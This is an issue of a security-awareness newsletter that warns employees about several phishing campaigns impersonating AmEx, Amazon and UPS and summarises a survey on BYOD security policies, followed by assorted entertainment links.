CyberheistNews vol2, #39

CyberheistNews Vol 2, #39

Editor's Corner

[caption id="attachment_1367" align="alignleft" width="150" caption="Stu"] cybercrime

[/caption]

Scam Of The Week: Fake AmEx "Security Verification"

Phishing attacks come in waves. Old ones get "refurbished" and sent out

again after several months. Shiny new ones are cooked up all the time.

Sometimes you see hybrids of old and new, and that's what is doing

the rounds at the moment. Remind all employees that they need to delete

these types of phishing attacks and not click on any unsubscribe

links!

The attack tries to make recipients open the file in the attachment and

fill out a detailed screen. The email claims to be a notification about

a "Membership Security Verification," and warns the recipient that a

"slight error" has been detected in their AmEx accounts. To correct the

error and prevent their account from getting shut down in the next 48 hours -

the recipient is urged to download the attached HTML file, open it in a

browser and fill out a boatload of information.

As you can see in this screenshot on our blog: http://blog.knowbe4.com/fake-amex-security-verification/ the criminals go whole hog and want

it all: username, address, home and work telephone numbers,

SSN#, mother's maiden name and date of birth, users' date of birth,

AmEx credit card number, expiry date, card security code, ATM PIN, email

address and the password for it. Obviously all this submitted data gets

sent to the criminal mothership and sold to the highest bidder!

New Survey Reveals: Companies Lack BYOD Security

According to new findings, KnowBe4, a Security Awareness Training firm,

and research firm ITIC, a large percent of companies do not have security

procedures in place for Bring Your Own Device programs.

While BYOD (bring your own device) deployments have been among the biggest

trends in corporate computing usage in the last 12 to 18 months, a recent

study found that 71% of businesses that allow BYOD, have no specific

policies and procedures in place to support BYOD deployment and ensure

security. The study was conducted by KnowBe4, a security awareness training

firm, and ITIC, a research and consulting firm based in the Boston area

specializing in conducting independent surveys tracking crucial trends.

Nearly two-thirds of businesses now allow end users to BYOD and use them

as corporate desktop or mobile devices to access organizational data

including email, applications and sensitive data. BYOD usage does help

businesses contain costs and lower the administrative burden of IT

departments as end users manage, maintain and in many cases pay for their

own devices, however: there is a huge downside to this trend: security.

Kevin Mitnick (former most-wanted hacker), KnowBe4s Chief Hacking

Officer said: Mobile devices are the new target-rich environment. Based

on lessons learned in the early days of the personal computer, businesses

should make it a top priority to proactively address mobile security so

they avoid same mistakes [of the PC era] that resulted in untold system

downtime and billions of dollars in economic loss.

Full Press Release here:

http://www.prweb.com/releases/2012/9/prweb9858074.htm

Please Forward This Newsletter To Your Friends

There are 40,000 people getting CyberheistNews every week, but

we need to get the word out to many more, to protect everyone's

network. Please forward this newsletter to people you know, that can

benefit. Here is the link to subscribe:

http://www.knowbe4.com/cyberheist-news/

Quotes of the Week

"Never memorize something that you can look up." - Albert Einstein

"No man has a good enough memory to be a successful liar." - Abraham Lincoln

"Nothing stands out so conspicuously, or remains so firmly fixed in the

memory, as something which you have blundered." - Marcus Tullius Cicero

Please tell your friends about CyberheistNews! They can subscribe here:

http://www.knowbe4.com/about-us/cyberheist-news/

Prevent Email Phishing

Want to stop Phishing Security Breaches? Did you know that many of the email addresses of your organization are exposed on the Internet and easy to find for cybercriminals? With these addresses they can launch spear-phishing attacks on your organization. This type of attack is very hard to defend against, unless your users are highly security awareness trained.

IT Security specialists call it your phishing attack surface. The more of your email addresses that are floating out there, the bigger your attack footprint is, and the higher the risk is. Find out now which of your email addresses are exposed with the free Email Exposure Check (EEC). An example would be the email address and password of one of your users on a crime site. Fill out the form and we will email you back with the list of exposed addresses. The number is usually higher than you think.

Fake Amazon Order Phish Exploits Recent Java Vulnerability

There is a brand new phishing attack that gets sent to people and

asks them to "click here and verify your order" with Amazon.

The phish is terrible; it looks bad and certainly not like it came

from Amazon. However, the sting is in the fact that it uses the

brand new 0-day vulnerability in Java and its use of the infamous

Blackhole Exploit kit. Example and more details at the Websense blog:

amazon-order-email-campaign-lead-to-blackhole-utilizing-new-java-vulnerability.aspx">http://community.websense.com/blogs/securitylabs/archive/2012/09/03/

amazon-order-email-campaign-lead-to-blackhole-utilizing-new-java-vulnerability.aspx

New Windows 8 Survey: Excited Or Underwhelmed?

Microsoft will officially launch Windows 8 on October 26. Are you excited

or underwhelmed? What do you think of the Metro interface? We would like

your opinion. Weve created a short survey its just 12 questions and

should take you only about five minutes to complete. All responses are kept

confidential. And once again, anyone who completes the survey and leaves

an essay comment is eligible to win a free iPad or iPod. To be eligible

to win the prizes you must leave your Email address along with your comment

in the Question 12 comment box. No sales people will call you and we never

share your information with anyone. Heres the link to the survey:

https://www.surveymonkey.com/s/V7M28M8

We will publish the survey results in this newsletter. In addition, anyone

who completes the survey and would like a complimentary copy of the ITIC

full Windows 8 Report can Email Laura DiDio directly at:ldidio@itic-corp.com

Thanks in advance for your participation! -- Laura & Stu

Wire Transfer Confirmation Phish Leads To Infections

Any employee that is responsible for wire and ACH transfers should get

a quick reminder about this attack. Webroot reports that over the past

24 hours, cybercriminals started spamvertising millions of emails

impersonating the United Parcel Service (UPS) in an attempt to trick

end users and corporate users into previewing a malicious .html attachment.

Upon previewing it, a tiny iFrame attempts to contact a client-side

exploits serving a landing URL, courtesy of the Black Hole web malware

exploitation kit. More at Webroot:

confirmation-themed-emails-lead-to-black-hole-exploit-kit/">http://blog.webroot.com/2012/09/04/spamvertised-wire-transfer-

confirmation-themed-emails-lead-to-black-hole-exploit-kit/

Prevent Email Phishing

Cyberheist 'FAVE' LINKS:

* This Week's Links We Like. Tips, Hints And Fun Stuff.

Low altitude canyon flying in a F-18 through Northern California and Oregon:

http://www.flixxy.com/beautiful-f-18-low-altitude-canyon-flying.htm

Software engineer Tom Gonzales spent 5 million dollars - including the

aircraft-carrier elevator platform - to create one of the most expensive

and incredible garages ever built:

http://www.flixxy.com/5-million-dollar-underground-garage.htm

People Are Super Awesome. The latest compilation of super-awesome feats

by some of the most accomplished athletes on the planet:

http://www.flixxy.com/people-are-super-awesome.htm

What happens when you pour lava onto ice? You would think that molten

lava being so hot (2,100 °F) would just melt through the ice. Not so:

http://www.flixxy.com/what-happens-when-you-pour-lava-onto-ice.htm

From the weird Japanese websites department. Ever seen these wiggly pictures

and ASCII art? My favorite ASCII one with cats is in the middle of the page:

http://weekly.ascii.jp/elem/000/000/040/40893/

BMW has figured out a clever way to promote its rear-view cameras:

http://www.flixxy.com/caught-in-rearview-camera.htm

Here is a handy tip for anyone who needs to separate eggs for cooking or baking:

http://www.flixxy.com/how-to-separate-eggs-using-a-plastic-bottle.htm

A humpback whale makes a surprise appearance to canoers close to the coast

of San Luis Obispo in California:

http://www.flixxy.com/humpback-whale-vs-2-women-in-kayaks.htm

A wind turbine that creates fresh water out of thin air:

http://www.flixxy.com/turbine-turns-wind-into-water.htm

Hope this never happens to me! The Missouri Highway Patrol releases dash-cam

video as troopers escort a driver in a KIA sorrento who said her accelerator

got stuck on Interstate 35. Some good hints about how to fix this:

http://www.flixxy.com/troopers-escort-driver-after-accelerator-gets-stuck.htm

Even if you're a social media recluse, advanced software algorithms can

glean a surprising amount of detail about your life:

http://www.flixxy.com/how-the-internet-can-read-your-mind.htm

Security Awareness Training Blog

CyberheistNews vol2, #39

ABOUT STU SJOUWERMAN

Subscribe to Our Blog

Posts by Tag

Posts By Topic

Get the latest about social engineering

Subscribe to CyberheistNews

Get the latest about social engineering

Subscribe to CyberheistNews